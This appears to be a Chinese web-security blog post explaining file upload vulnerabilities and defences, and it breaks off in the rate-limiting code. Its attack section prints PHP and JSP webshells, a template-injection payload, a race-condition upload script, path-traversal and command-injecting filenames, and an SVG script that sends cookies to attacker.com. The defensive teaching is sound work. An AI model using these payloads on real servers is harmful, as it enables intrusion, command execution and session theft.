<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="文件上传安全：原理、攻击与防御, 是小竹不是小猪">
    <meta name="description" content="一、文件上传的核心原理1.1 HTTP  multipart/form-data 协议文件上传依赖 HTTP POST 请求的 multipart/form-data 编码类型。与 application/x-www-form-urlenc">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>文件上传安全：原理、攻击与防御 | 是小竹不是小猪</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">是小竹不是小猪</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">是小竹不是小猪</div>
        <div class="logo-desc">
            
            每一年都奔走在自己的热爱里
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/23.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">文件上传安全：原理、攻击与防御</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">安全</span>
                            </a>
                        
                            <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
                                <span class="chip bg-color">文件上传</span>
                            </a>
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-08-06
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="一、文件上传的核心原理"><a href="#一、文件上传的核心原理" class="headerlink" title="一、文件上传的核心原理"></a>一、文件上传的核心原理</h3><h4 id="1-1-HTTP-multipart-form-data-协议"><a href="#1-1-HTTP-multipart-form-data-协议" class="headerlink" title="1.1 HTTP  multipart/form-data 协议"></a>1.1 HTTP  multipart/form-data 协议</h4><p>文件上传依赖 HTTP POST 请求的 <code>multipart/form-data</code> 编码类型。与 <code>application/x-www-form-urlencoded</code> 不同，它将请求体按 boundary 分割为多个部分，每个部分可以携带独立的 Content-Type 和文件名。</p>
<pre><code>POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk

------WebKitFormBoundary7MA4YWxk
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;shell.php&quot;
Content-Type: application/x-php

&lt;?php phpinfo(); ?&gt;
------WebKitFormBoundary7MA4YWxk--
</code></pre>
<p>关键点在于：<code>filename</code> 字段和 <code>Content-Type</code> 字段完全由客户端控制，服务端不能信任这两个值中的任何一个。这是文件上传安全问题的根源。</p>
<h4 id="1-2-服务端处理流程"><a href="#1-2-服务端处理流程" class="headerlink" title="1.2 服务端处理流程"></a>1.2 服务端处理流程</h4><p>典型的服务端文件上传处理分为以下几个阶段：接收原始字节流 → 解析 multipart 结构 → 提取文件名和类型 → 执行校验逻辑 → 写入文件系统或对象存储 → 返回结果。</p>
<p>攻击面分布在这条链路的几乎每个环节。文件名解析阶段的绕过针对的是”校验逻辑”，内容类型伪造针对的也是”校验逻辑”，而路径穿越则同时涉及文件名解析和写入阶段。</p>
<h4 id="1-3-为什么文件上传危险"><a href="#1-3-为什么文件上传危险" class="headerlink" title="1.3 为什么文件上传危险"></a>1.3 为什么文件上传危险</h4><p>文件上传的本质风险是：攻击者将恶意内容写入服务端可执行环境。一旦满足两个条件就构成完整漏洞——恶意内容被存储到了服务端，且该内容能被服务端以某种方式执行或触发。</p>
<hr>
<h3 id="二、攻击手段全景"><a href="#二、攻击手段全景" class="headerlink" title="二、攻击手段全景"></a>二、攻击手段全景</h3><h4 id="2-1-文件类型绕过"><a href="#2-1-文件类型绕过" class="headerlink" title="2.1 文件类型绕过"></a>2.1 文件类型绕过</h4><p><strong>2.1.1 前端校验绕过</strong></p>
<p>最基础的场景。很多系统仅靠 JavaScript 的 <code>accept</code> 属性或文件扩展名白名单做前端拦截。攻击者只需修改请求中的 <code>filename</code> 扩展名即可绕过，或者直接用 Burp Suite / curl 构造请求，完全跳过前端。</p>
<pre><code class="bash"># 将 .php 改为 .jpg，但内容仍是 PHP
curl -X POST http://target/upload \
  -F &quot;file=@shell.php;type=image/jpeg;filename=shell.jpg&quot;
</code></pre>
<p><strong>2.1.2 MIME 类型伪造</strong></p>
<p>HTTP 请求中每个 multipart 部分都有一个 <code>Content-Type</code> 字段，这个值完全由客户端填写，服务端读到的就是客户端发的原文。问题在于很多开发者用这个值来判断文件类型：</p>
<pre><code class="php">// 危险写法：直接信任客户端发来的 Content-Type
if ($_FILES[&#39;file&#39;][&#39;type&#39;] === &#39;image/jpeg&#39;) &#123;
    move_uploaded_file($_FILES[&#39;file&#39;][&#39;tmp_name&#39;], &#39;/uploads/&#39; . $_FILES[&#39;file&#39;][&#39;name&#39;]);
&#125;
</code></pre>
<p>攻击者用 Burp Suite 或 curl 构造请求时，把 <code>Content-Type</code> 随便写：</p>
<pre><code class="bash">curl -F &quot;file=@webshell.php;type=image/jpeg&quot; http://target/upload
</code></pre>
<p>服务端收到的 <code>$_FILES[&#39;file&#39;][&#39;type&#39;]</code> 就是 <code>image/jpeg</code>，校验通过，但实际写入磁盘的是一个 PHP 文件。本质原因是 <strong>HTTP 协议层面没有任何机制强制客户端如实声明文件类型</strong>，这只是一个建议性的请求头字段，和浏览器自动检测的真实类型无关。PHP 中 <code>$_FILES[&#39;file&#39;][&#39;type&#39;]</code> 读的就是这个值，完全不可信。</p>
<p><strong>2.1.3 扩展名黑名单绕过</strong></p>
<p>黑名单策略试图拦截 <code>.php</code>、<code>.jsp</code>、<code>.exe</code> 等危险扩展名，但几乎不可能穷举所有变体：</p>
<ul>
<li>大小写变体：<code>.PhP</code>、<code>.pHp</code></li>
<li>双写绕过：<code>.pphphp</code>（如果过滤逻辑只删除一次 <code>.php</code>）</li>
<li>等价扩展名：<code>.php3</code>、<code>.php5</code>、<code>.phtml</code>、<code>.phps</code>（Apache 可配置为解析 PHP）</li>
<li>不可见字符：<code>shell.php </code>（末尾空格）、<code>shell.php.</code>（末尾点号），Windows 会自动去除</li>
<li><code>.htaccess</code> 上传：上传 <code>.htaccess</code> 文件让服务器将 <code>.jpg</code> 当 PHP 解析</li>
</ul>
<pre><code class="apache"># .htaccess 内容：让所有 .jpg 文件被当作 PHP 执行
AddType application/x-httpd-php .jpg
</code></pre>
<p>三种典型手法的原理展开：</p>
<p><strong>大小写变体。</strong> 黑名单通常只列了小写的 <code>.php</code>，但 Windows 文件系统不区分大小写，<code>Shell.PhP</code> 和 <code>shell.php</code> 指向同一个文件。如果服务端用字符串匹配做黑名单检查但没做 <code>toLowerCase()</code>，<code>PhP</code> 就绕过了。Linux 上虽然文件系统区分大小写，但 Apache 的 <code>AddHandler</code> 配置也可以做成大小写不敏感匹配。</p>
<p><strong>双扩展名 <code>shell.php.jpg</code>。</strong> 分两种情况。第一种，有些系统的校验逻辑是”看最后一个扩展名是不是在白名单里”，<code>shell.php.jpg</code> 的最后扩展名是 <code>.jpg</code>，通过了检查。但如果 Apache 配置了 <code>AddHandler php-script .php</code>，它会从文件名中找到 <code>.php</code> 并按 PHP 执行，忽略后面的 <code>.jpg</code>。第二种，如果校验逻辑是”文件名中是否包含 <code>.php</code>“，攻击者可能用 <code>shell.php.jpg.php</code> 来绕过——有些过滤只检查一次，替换掉第一个 <code>.php</code> 后还剩一个。</p>
<p><strong>空字节截断 <code>shell.php%00.jpg</code>。</strong> 这个问题出在 C 语言层面。C 字符串以 <code>\0</code>（空字节）作为终止符。PHP 5.3.4 以下版本和早期 Java 的文件操作中，文件名在传递给底层 C 函数（如 <code>fopen</code>、<code>stat</code>）之前没有过滤空字节。攻击者发送 <code>filename=shell.php%00.jpg</code>，服务端的校验逻辑看到的是 <code>shell.php.jpg</code>（按字符串比较，<code>.jpg</code> 后缀安全），但传递给操作系统写入文件时，C 函数遇到 <code>%00</code> 就截断了，实际创建的文件名是 <code>shell.php</code>。这个漏洞在现代 PHP（5.3.4+）中已修复，但在一些老旧系统或用 JNI 调用本地库的 Java 应用中仍可能遇到。</p>
<p><strong>2.1.4 Magic Number（文件头）伪造</strong></p>
<p>服务端如果只检查文件前几个字节（magic number），攻击者可以在恶意文件头部插入合法的文件签名：</p>
<pre><code>GIF89a
&lt;?php phpinfo(); ?&gt;
</code></pre>
<p>这样文件的前 6 个字节就是 GIF 的 magic number <code>47 49 46 38 39 61</code>，能通过文件头检查。如果服务端没有进一步校验文件完整性（比如图片是否能正常解码），这种绕过就能成功。</p>
<p><strong>2.1.5 条件竞争（Race Condition）</strong></p>
<p>当服务端采用”先保存再删除”的策略时（先写入临时文件，检查不通过后删除），存在一个时间窗口。攻击者可以并发发送大量请求，在文件被删除之前访问它：</p>
<pre><code class="python">import threading
import requests

target = &quot;http://target/uploads/&quot;

def access_file():
    while True:
        r = requests.get(target + &quot;shell.php&quot;)
        if r.status_code == 200 and &quot;phpinfo&quot; in r.text:
            print(&quot;Got shell!&quot;)
            break

# 上传线程
def upload_file():
    while True:
        requests.post(&quot;http://target/upload&quot;,
            files=&#123;&quot;file&quot;: (&quot;shell.php&quot;, b&quot;&lt;?php phpinfo(); ?&gt;&quot;)&#125;)

threads = [threading.Thread(target=access_file) for _ in range(10)]
threads += [threading.Thread(target=upload_file) for _ in range(5)]
for t in threads: t.start()
</code></pre>
<h4 id="2-2-路径穿越（Path-Traversal）"><a href="#2-2-路径穿越（Path-Traversal）" class="headerlink" title="2.2 路径穿越（Path Traversal）"></a>2.2 路径穿越（Path Traversal）</h4><p>攻击者在文件名中注入 <code>../</code> 序列，试图将文件写入 Web 根目录之外的任意位置：</p>
<pre><code>filename=../../etc/cron.d/backdoor
filename=..\..\Windows\System32\cmd.exe
</code></pre>
<p>不同语言的路径穿越风险点不同。Java 的 <code>File.getName()</code> 不会自动过滤 <code>../</code>，Python 的 <code>os.path.join</code> 遇到绝对路径会直接切换根目录。Node.js 的 <code>path.resolve</code> 也有类似问题。</p>
<h4 id="2-3-文件名注入"><a href="#2-3-文件名注入" class="headerlink" title="2.3 文件名注入"></a>2.3 文件名注入</h4><p>文件名是用户可控的字符串。如果后端拿到文件名后不做转义就直接拼进其他操作，就会引发与上传无关的第二层漏洞。</p>
<p><strong>SQL 注入场景：</strong></p>
<pre><code class="php">$filename = $_FILES[&#39;file&#39;][&#39;name&#39;];  // 攻击者可控
// 假设攻击者构造 filename = &quot;x.jpg&#39;); DROP TABLE uploads;--&quot;
$sql = &quot;INSERT INTO files (filename, path) VALUES (&#39;$filename&#39;, &#39;$path&#39;)&quot;;
// 展开后：
// INSERT INTO files (filename, path) VALUES (&#39;x.jpg&#39;); DROP TABLE uploads;--&#39;, &#39;/uploads/xxx&#39;)
</code></pre>
<p>数据库执行了攻击者注入的 <code>DROP TABLE</code>。</p>
<p><strong>命令注入场景：</strong></p>
<pre><code class="php">$filename = $_FILES[&#39;file&#39;][&#39;name&#39;];  // 攻击者构造: &quot;a.jpg; cat /etc/passwd&quot;
system(&quot;file /uploads/&quot; . $filename);
// 展开后：
// file /uploads/a.jpg; cat /etc/passwd
</code></pre>
<p>shell 会把 <code>;</code> 后面的内容当作第二条命令执行。</p>
<p><strong>日志注入场景：</strong> 如果文件名被原样写入 access log，攻击者可以注入换行符伪造日志条目，或者注入 <code>%s</code> 等格式化字符串触发格式化字符串漏洞。</p>
<p>核心问题是：<strong>文件名被当作不可信输入，但下游代码把它当成了安全数据。</strong></p>
<h4 id="2-4-解析漏洞利用"><a href="#2-4-解析漏洞利用" class="headerlink" title="2.4 解析漏洞利用"></a>2.4 解析漏洞利用</h4><p><strong>2.4.1 Apache 多扩展名解析</strong></p>
<p>Apache 默认从右向左识别扩展名，如果右侧扩展名无法识别，则向左回溯。配置 <code>AddHandler</code> 后，<code>shell.php.xxx</code> 可能被当作 PHP 执行。</p>
<p><strong>2.4.2 IIS 解析漏洞</strong></p>
<p>IIS 6.0 中，目录名包含 <code>.asp</code> 则该目录下所有文件都被当作 ASP 执行（如 <code>/xx.asp/</code> 目录下的 <code>.jpg</code> 文件）。IIS 7.0/7.5 在 <code>cgi.fix_pathinfo=1</code> 时存在解析漏洞：访问 <code>/upload/1.jpg/.php</code>，如果 <code>1.jpg</code> 存在，则按 PHP 解析。</p>
<p><strong>2.4.3 Nginx 解析漏洞</strong></p>
<p>Nginx 的 <code>cgi.fix_pathinfo</code> 配置不当也会导致类似问题。此外，如果配置了 <code>location ~ \.php$</code> 和 <code>location /upload/</code>，上传 <code>shell.jpg</code> 后访问 <code>shell.jpg/.php</code> 可能被 PHP-FPM 解析。</p>
<p><strong>2.4.4 PHP 的 <code>$_FILES</code> 特性</strong></p>
<p>PHP 在处理 <code>multipart/form-data</code> 时，如果存在多个同名的 <code>file</code> 字段，后面的值会覆盖前面的值。攻击者可以利用这个特性绕过只检查第一个文件的逻辑：</p>
<pre><code>Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;a.jpg&quot;
Content-Type: image/jpeg
[jpeg data]

Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;shell.php&quot;
Content-Type: application/x-php
[php code]
</code></pre>
<h4 id="2-5-内容相关攻击"><a href="#2-5-内容相关攻击" class="headerlink" title="2.5 内容相关攻击"></a>2.5 内容相关攻击</h4><p><strong>2.5.1 WebShell 上传</strong></p>
<p>最终目标通常是上传一个 WebShell——一段能被服务端解释器执行的恶意代码。不同语言有不同形态：</p>
<pre><code class="php">// PHP 一句话木马
&lt;?php @eval($_POST[&#39;cmd&#39;]); ?&gt;
</code></pre>
<pre><code class="jsp">// JSP WebShell
&lt;% Runtime.getRuntime().exec(request.getParameter(&quot;cmd&quot;)); %&gt;
</code></pre>
<pre><code class="python"># Python (Flask debug 模式下)
&#123;&#123; config.__class__.__init__.__globals__['os'].popen('id').read() &#125;&#125;
</code></pre>
<p><strong>2.5.2 图片马（Polyglot）</strong></p>
<p>将恶意代码嵌入图片文件的冗余数据区域（如 EXIF Comment、GIF 尾部），使其既是合法图片又是可执行脚本。配合文件包含漏洞（LFI）触发执行：</p>
<pre><code class="bash"># 将 PHP 代码写入图片的 EXIF 注释
exiftool -Comment=&quot;&lt;?php phpinfo(); ?&gt;&quot; image.jpg
</code></pre>
<p><strong>2.5.3 二次注入 / 存储型 XSS</strong></p>
<p>假设一个社交平台允许用户上传头像，且上传目录可以通过 <code>https://www.example.com/uploads/xxx.svg</code> 直接访问。攻击者上传一个 SVG 文件：</p>
<pre><code class="xml">&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;script&gt;
    fetch(&#39;https://www.example.com/api/user/info&#39;).then(r =&gt; r.json()).then(data =&gt; &#123;
      new Image().src = &#39;https://attacker.com/steal?cookie=&#39; + document.cookie;
    &#125;);
  &lt;/script&gt;
&lt;/svg&gt;
</code></pre>
<p>当其他用户浏览到这个 SVG 时，浏览器会渲染它并执行其中的 JavaScript。因为 SVG 和主站在同一个域名 <code>www.example.com</code> 下，这段脚本能读取主站的 Cookie、调用主站的 API、以受害者的身份执行操作。</p>
<p>这里的关键不是上传本身有漏洞，而是 <strong>上传目录没有做域名隔离</strong>。如果上传文件放在 <code>files.example.com</code> 或 CDN/OSS 上，即使 SVG 里有恶意脚本，它也只能在 <code>files.example.com</code> 的上下文中执行，拿不到主站的 Cookie。</p>
<p>如果上传目录没有做独立的 Origin 隔离或 CSP 限制，这段脚本会在目标域下执行。</p>
<h4 id="2-6-拒绝服务（DoS）"><a href="#2-6-拒绝服务（DoS）" class="headerlink" title="2.6 拒绝服务（DoS）"></a>2.6 拒绝服务（DoS）</h4><p>上传超大文件、Zip 炸弹（解压后体积指数膨胀）、或大量并发上传耗尽磁盘/连接资源。一个经典的 Zip 炸弹是 42KB 的 ZIP 文件解压后达到 4.5PB。</p>
<hr>
<h3 id="三、防御策略"><a href="#三、防御策略" class="headerlink" title="三、防御策略"></a>三、防御策略</h3><h4 id="3-1-文件名处理"><a href="#3-1-文件名处理" class="headerlink" title="3.1 文件名处理"></a>3.1 文件名处理</h4><p><strong>核心原则：永远不要信任客户端传来的文件名。</strong></p>
<p>最安全的做法是服务端生成随机文件名，仅保留原始扩展名用于类型判断：</p>
<pre><code class="java">// Java: 生成随机文件名
String originalName = file.getOriginalFilename();
String ext = FilenameUtils.getExtension(originalName);
String storedName = UUID.randomUUID().toString() + &quot;.&quot; + ext;
Path target = uploadDir.resolve(storedName);
</code></pre>
<pre><code class="python"># Python: 使用 werkzeug 的安全文件名处理
from werkzeug.utils import secure_filename
import os, uuid

filename = secure_filename(file.filename)  # 去除路径分隔符和特殊字符
ext = os.path.splitext(filename)[1]
stored_name = f&quot;&#123;uuid.uuid4().hex&#125;&#123;ext&#125;&quot;
</code></pre>
<pre><code class="php">// PHP: 生成随机文件名
$ext = pathinfo($_FILES[&#39;file&#39;][&#39;name&#39;], PATHINFO_EXTENSION);
$stored_name = bin2hex(random_bytes(16)) . &#39;.&#39; . $ext;
</code></pre>
<p>如果必须保留原始文件名，需要过滤 <code>../</code>、<code>..\\</code>、空字节 <code>%00</code>、以及所有控制字符，并做路径规范化后验证结果路径仍在预期目录内：</p>
<pre><code class="java">Path target = uploadDir.resolve(filename).normalize();
if (!target.startsWith(uploadDir)) &#123;
    throw new SecurityException(&quot;Path traversal detected&quot;);
&#125;
</code></pre>
<h4 id="3-2-文件类型校验（多层纵深）"><a href="#3-2-文件类型校验（多层纵深）" class="headerlink" title="3.2 文件类型校验（多层纵深）"></a>3.2 文件类型校验（多层纵深）</h4><p>单一校验手段都可以被绕过，必须多层叠加：</p>
<p><strong>第一层：扩展名白名单。</strong> 白名单优于黑名单，因为可枚举的合法类型远少于需要拦截的类型。注意处理大小写、双扩展名（<code>shell.php.jpg</code>）、空字节截断（<code>shell.php%00.jpg</code>，Java/PHP 5.3 以下受影响）。</p>
<p><strong>第二层：Magic Number 校验。</strong> 读取文件实际内容的前几个字节，与预期签名比对：</p>
<pre><code class="python">MAGIC_NUMBERS = &#123;
    b&#39;\xff\xd8\xff&#39;: &#39;jpg&#39;,
    b&#39;\x89PNG&#39;: &#39;png&#39;,
    b&#39;GIF87a&#39;: &#39;gif&#39;,
    b&#39;GIF89a&#39;: &#39;gif&#39;,
    b&#39;%PDF&#39;: &#39;pdf&#39;,
&#125;

def verify_magic(file_path, expected_type):
    with open(file_path, &#39;rb&#39;) as f:
        header = f.read(8)
    for magic, ftype in MAGIC_NUMBERS.items():
        if header.startswith(magic) and ftype == expected_type:
            return True
    return False
</code></pre>
<pre><code class="java">// Java: 使用 Tika 做内容类型检测
Tika tika = new Tika();
String detected = tika.detect(file.getInputStream());
if (!&quot;image/jpeg&quot;.equals(detected)) &#123;
    throw new SecurityException(&quot;Content type mismatch&quot;);
&#125;
</code></pre>
<p><strong>第三层：内容完整性校验。</strong> 对图片文件，用图像处理库尝试解码并重新编码，验证它确实是合法图片：</p>
<pre><code class="python">from PIL import Image

def verify_image(file_path):
    try:
        img = Image.open(file_path)
        img.verify()  # 验证图片完整性
        return True
    except Exception:
        return False
</code></pre>
<p><strong>第四层：MIME 类型交叉验证。</strong> 将扩展名、magic number、<code>Content-Type</code> 三者交叉比对，任何不一致都拒绝。</p>
<h4 id="3-3-存储与执行隔离"><a href="#3-3-存储与执行隔离" class="headerlink" title="3.3 存储与执行隔离"></a>3.3 存储与执行隔离</h4><p><strong>上传目录禁止执行。</strong> 这是最关键的一道防线。即使前面所有校验都被绕过，只要上传目录不能执行脚本，攻击就无法完成。</p>
<pre><code class="apache"># Apache: 上传目录禁止执行脚本
&lt;Directory &quot;/var/www/uploads&quot;&gt;
    Options -ExecCGI
    RemoveHandler .php .phtml .php3 .php5
    &lt;FilesMatch &quot;\.(php|phtml|php3|php5|pl|py|jsp|asp|aspx)$&quot;&gt;
        Require all denied
    &lt;/FilesMatch&gt;
&lt;/Directory&gt;
</code></pre>
<pre><code class="nginx"># Nginx: 上传目录只允许静态文件
location /uploads/ &#123;
    location ~ \.(php|jsp|asp|aspx|py|pl)$ &#123;
        deny all;
    &#125;
&#125;
</code></pre>
<p><strong>使用独立的文件存储域名或 CDN。</strong> 将上传文件放在 <code>files.example.com</code> 或对象存储（如 S3/OSS）上，与应用主域名 <code>www.example.com</code> 隔离。这样即使上传了 XSS payload，也无法读取主域的 Cookie。配合 <code>Content-Security-Policy</code> 和独立的 Origin 进一步限制。</p>
<p><strong>对象存储优先于本地文件系统。</strong> 使用 S3/OSS 等对象存储天然不存在本地文件执行的风险，且可以设置 Bucket Policy 限制 Content-Type 和公开访问范围。</p>
<h4 id="3-4-文件大小与速率限制"><a href="#3-4-文件大小与速率限制" class="headerlink" title="3.4 文件大小与速率限制"></a>3.4 文件大小与速率限制</h4><pre><code class="python"># Flask 示例
app.config[&#39;MAX_CONTENT_LENGTH&#39;] = 10 * 1024 * 1024  # 10MB 上限

# 速率限制
from flask_limiter import Limiter
limiter = Limiter(app, default_limits=[&quot;100 per minute&quot;])

@app.route(&quot;/upload&quot;, methods=[&quot;POST&quot;])
@limiter.limit(&quot;10 per minute&quot;)
def upload():
    ...
